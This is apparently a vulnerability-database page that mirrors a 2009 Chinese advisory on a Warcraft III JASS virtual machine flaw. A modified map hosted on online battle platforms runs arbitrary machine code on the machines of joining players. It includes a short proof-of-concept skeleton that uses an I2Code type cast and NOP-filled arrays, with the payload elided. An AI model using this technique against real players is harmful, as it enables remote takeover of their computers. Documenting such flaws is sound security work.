Lucene search
K

War3 Jass虚拟机执行任意机器码严重漏洞

🗓️ 09 Aug 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 114 Views

War3 Jass虚拟机执行任意机器码严重漏洞。使用地图修改执行恶意代

Code

                                                登陆浩方或者VS对战平台,修改某张地图(例如DOTA的地图),开启游戏,等待其他玩家进入,开始游戏,即可执行任意机器码,控制玩家计算机。

set bj_meleeTwinkedHeroes[1024] = 0x90909090
set bj_meleeTwinkedHeroes[1025] = 0x90909090 //and other bytecode giberish.
...

local code C = I2Code( code2I(function GetRandomDirectionDeg) + 0xC92D8 )

call TriggerAddAction(t, C)
call TriggerExecute(t)

//It will run whatever bytecode 90 90 90 90 means

function main takes nothing returns nothing
set t = CreateTrigger()
call TriggerAddAction(t, i2code(0x00929217) )
a[0]=0x45623512
a[1]=0x34562323
a[2]=0x62329301
...
//other thousand lines of this
...
b[0]=0x12312333
endfunction
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Aug 2009 00:00Current
7.1High risk
Vulners AI Score7.1
114